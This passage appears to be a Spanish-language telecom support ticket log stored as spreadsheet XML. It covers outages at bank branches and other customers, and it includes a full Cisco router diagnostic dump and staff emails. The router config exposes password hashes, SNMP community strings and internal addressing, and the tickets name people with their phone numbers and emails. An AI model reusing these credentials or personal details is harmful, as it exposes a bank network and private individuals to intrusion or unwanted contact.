    <t>EL PROVEEDOR APERTURA TICKET SE PROCEDE A DEJAR EN ETAPA PENDIENTE PORVEEDOR NO SE APERTURA WO POR QUE ES UN TICKET PORACTIVO SE DARA SEGUIMIENTO SEGUN DIAGNOSTICO DE UFINET</t>
  </si>
  <si>
    <t>F4576524</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 11:30AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t xml:space="preserve">CLIENTE SOLICITA MONITOREO HASTA LAS 11:30 HRS  SE PROCEDE CON LA PETICION DEL CLIENTE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 16 HOR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8120001 UPTIME IS 16 HOURS, 57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0842R
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255488K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1830842R
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_8120001#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4158 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_8120001
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$OXDI$LZGXB2ZIFCGDGV0ANMEOL0
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1830842R
!
!
USERNAME GESTIONIP SECRET 5 $1$KDIG$8EFKU1L95TTOSNOCAWUMW0
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.81 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN REDUNDANTE/_/8902347T/_/
 BANDWIDTH 2048
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0.2249
 DESCRIPTION WAN REDUNDANTE/_/8902347T/_/
 BANDWIDTH 2048
 ENCAPSULATION DOT1Q 2249
 IP ADDRESS 10.16.203.136 255.255.255.128
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8900658T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.16.203.22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ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.135.155.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.165.155.126 255.255.255.0
!
ROUTER OSPF 1
 ROUTER-ID 10.16.203.22
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.16.203.0 0.0.0.63 AREA 164
 NEIGHBOR 10.16.203.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.16.203.129 220
!
!
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.165.155.0/24
IP PREFIX-LIST CONNECTED SEQ 25 PERMIT 10.212.120.81/32
IP PREFIX-LIST CONNECTED SEQ 30 PERMIT 10.135.155.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
NO CDP RUN
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 1 AVENIDA 2-05 ZONA 1 SAN JOSE EL GOLFO EDIF. MUNICIPAL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CC_BANRURAL_GT_AGENCIA_8120001#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 95 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 95 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 98 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
 INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:38:17.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:41:09.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:41:10.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:47:44.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:47:45.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:47:51.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:47:52.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:54:48.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:54:49.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:54:53.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:54:56.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 10:55:00.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 10:55:01.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 11:04:27.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 11:04:28.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 11:04:28.991 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 0.0.0.0 ON GIGABITETHERNET0/1 FROM DOWN TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 24 11:04:30.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 11:04:31.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 24 11:04:33.991 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 24 11:04:39.999 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 11:04:40.999 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 11:04:50.999 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 11:04:51.999 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 24 11:05:03.591 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 24 12:05:51.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 12:05:52.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 12:05:52.991 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 24 12:05:56.991 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 12:05:57.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 12:05:57.991 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 24 12:06:13.267 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 24 20:26:37.989 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 20:26:38.989 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 20:26:38.989 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 24 20:26:42.989 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 20:26:43.989 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 20:26:43.989 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 24 20:27:12.401 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 24 23:39:08.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 23:39:09.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 24 23:39:09.988 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 24 23:39:13.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 23:39:14.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 24 23:39:14.988 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 24 23:39:43.104 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 25 00:08:08.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 00:08:09.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 00:08:09.988 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 25 00:08:13.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 00:08:14.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 00:08:14.988 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 25 00:08:42.888 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 25 00:43:58.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 00:43:59.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 00:43:59.996 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 25 00:44:02.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 00:44:03.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 00:44:38.572 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 25 01:11:21.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 01:11:22.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 01:11:22.988 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 25 01:11:26.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 01:11:27.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 01:11:27.988 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.135.155.16 IN NSSA 164 - P-BIT CLEARED
*MAY 25 01:11:42.136 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 25 01:23:16.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 01:23:17.996 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 25 01:23:17.996 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 25 01:23:20.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 01:23:21.988 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 25 01:23:37.660 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.16.203.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_8120001#
SHOW CLOCK
*03:29:08.815 GUA WED MAY 25 2022
CC_BANRURAL_GT_AGENCIA_8120001#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.16.203.1             2   B443.2673.128E  ARPA   GIGABITETHERNET0/1
INTERNET  10.16.203.22            -   F40F.1B57.E8E1  ARPA   GIGABITETHERNET0/1
INTERNET  10.16.203.129           0   B443.2673.16C6  ARPA   GIGABITETHERNET0/0.2249
INTERNET  10.16.203.132           3   F40F.1B57.48C1  ARPA   GIGABITETHERNET0/0.2249
INTERNET  10.16.203.136           -   F40F.1B57.E8E0  ARPA   GIGABITETHERNET0/0.2249
INTERNET  10.16.203.138         250   D867.D9FC.E6C1  ARPA   GIGABITETHERNET0/0.2249
INTERNET  10.135.155.17           -   F40F.1B57.E8E3  ARPA   VLAN1
INTERNET  10.135.155.22           0   F08E.DB17.910A  ARPA   VLAN1
INTERNET  10.165.155.126          -   F40F.1B57.E8E3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_8120001#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN REDUNDANTE/_/8902347T/_/
GI0/0.2249                     UP             UP       WAN REDUNDANTE/_/8902347T/_/
GI0/1                          UP             UP       WAN PRINCIPAL/_/8900658T/_/
GI0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/1                        UP             UP       LAN DEL CLIENTE
GI0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_8120001#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.2249    10.16.203.136   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.16.203.22    YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.120.81   YES NVRAM  UP                    UP
VLAN1                      10.165.155.126  YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_8120001#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.16.203.22
  PING 10.16.203.22: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.203.22 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.11
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.203.22
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.16.203.22/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4576555</t>
  </si>
  <si>
    <t>SE LLAMÓ A CENTRAL 30727797 PARA APOYO EN GESTIONAR LOS PERMISOS DE INGRESO A PR; NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.
ADICIONAL SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE QUE NOS INCLUYAN EN LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>SE GESTIONAN ACCESOS  |  LA ESPERA DE RESPUESTA
GESTON DE ACCESOS F4576555 | CITIBANK - PROMERICA | 0 - BOULEVARD LIBERACION 4-11 PLAZA ASADIS ZONA 9
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:SOPORTEOPERACIONIT@BANCOPROMERICA.COM.GT
CC:CNOCCA;GRUPO N1
MIÉ 25/05/2022 10:19
BUENA DÍA ESTIMADO CLIENTE
     SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA  VALIDAR SERVICIO EN :  F4576555 |  CITIBANK - PROMERICA | 0 - BOULEVARD LIBERACION 4-11 PLAZA ASADIS ZONA 9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AGRADECEMOS   CONFIRMAR HORA Y FECHA DE VISITA PARA COORDINAR PERSONAL TÉCNICO
EN ESPERA DE SUS COMENTARIOS QUEDO ATENTO.,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER AROCHE 24139400 EXT 87270 QUIEN COLOCA EN LA LLAMADA A PR KEVIN , SE DEJA EN CONFERENCIA CON PR
-ID 2001073930</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL VICTOR GIRON 30727797 RESPONDE WLATER AROCHE QUIEN SOLICITA LLAMADA AL NUMERO 24139400 EXT 87270
-ID 2001072885</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERBER JUAREZ 24139090 EXT. 82570 NO RESPONDE, SE INTENTARA LUEGO
-2001071809 - 2001072536</t>
  </si>
  <si>
    <t>F4576596</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE COMPARTIENDO OTRO CONTACTO
DE: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 9:31
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; PEDRO JACOBO PAREDES LOPEZ &lt;JACOBO.PAREDES@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;
ASUNTO: RE: FALLA ENLACE GRANJA AVICOLA SAN RAYMUNDO_5800037
BUEN DÍA, FAVOR CONTACTAR A AURELIO GARCÍA 4359-5470 O DIRECTO DE LA GRANJA :4210-5426.
SALUDOS,
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 42105426 NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001084323</t>
  </si>
  <si>
    <t>F4576607</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 10:00
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ICXN-00069OC::: TICKET CNOC IMVOL007787::: "FUERA DE SERVICIO "
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RESPONDE VICTOR MENCIONA QUE YA OBSERVAN EL SERVICIO OPERATIVO, CONFIRMA INCONVENIENTE DE ENERGIA EN PR
-ID 2001085759</t>
  </si>
  <si>
    <t>F4576641</t>
  </si>
  <si>
    <t>*** SE SOLICITA VISITA EL DÍA DE HOY A LAS 12H ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 8:22
PARA: MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || CC_TYT_GT_ATM0498 || ATM 498, TRANSPORTES MONJA BLANCA, 2 CALLE ZONA 4 COBAN ALTA VERAPAZ
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO EN CONFIRMAR SI ESTARÁ BIEN EL DÍA DE HOY 30/05 A LAS 12H REALIZAR LA VISITA.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4576642</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN MANZO 46261534  MENCIONA QUE NO CUENTAN CON ENERGIA DESDE AYER PERO ESTAN TRABAJANDO CON PLANTA, CLIENTE INDICA QUE YA APLICARON REINICIO PERO INCONVENIENTE PERSISTE
-ID 2001057258
NOMBRE DEL CLIENTE: BANCO DE DESARROLLO RURAL, S.A.
UBICACIÓN:KILOMETRO 87 RUTA A GUATEMALA VIA LA CANOA,ALDEA LLANO GRANDE, SALAMA BAJA VERAPAZ
CONTACTO EN SITIO: EDWIN MANZO - 46261534
HORARIO DE ATENCION:7:30 - 16:00
GESTIÓN DE PERMISOS: ENVIAR DATOS A CENTRAL</t>
  </si>
  <si>
    <t>F4576643</t>
  </si>
  <si>
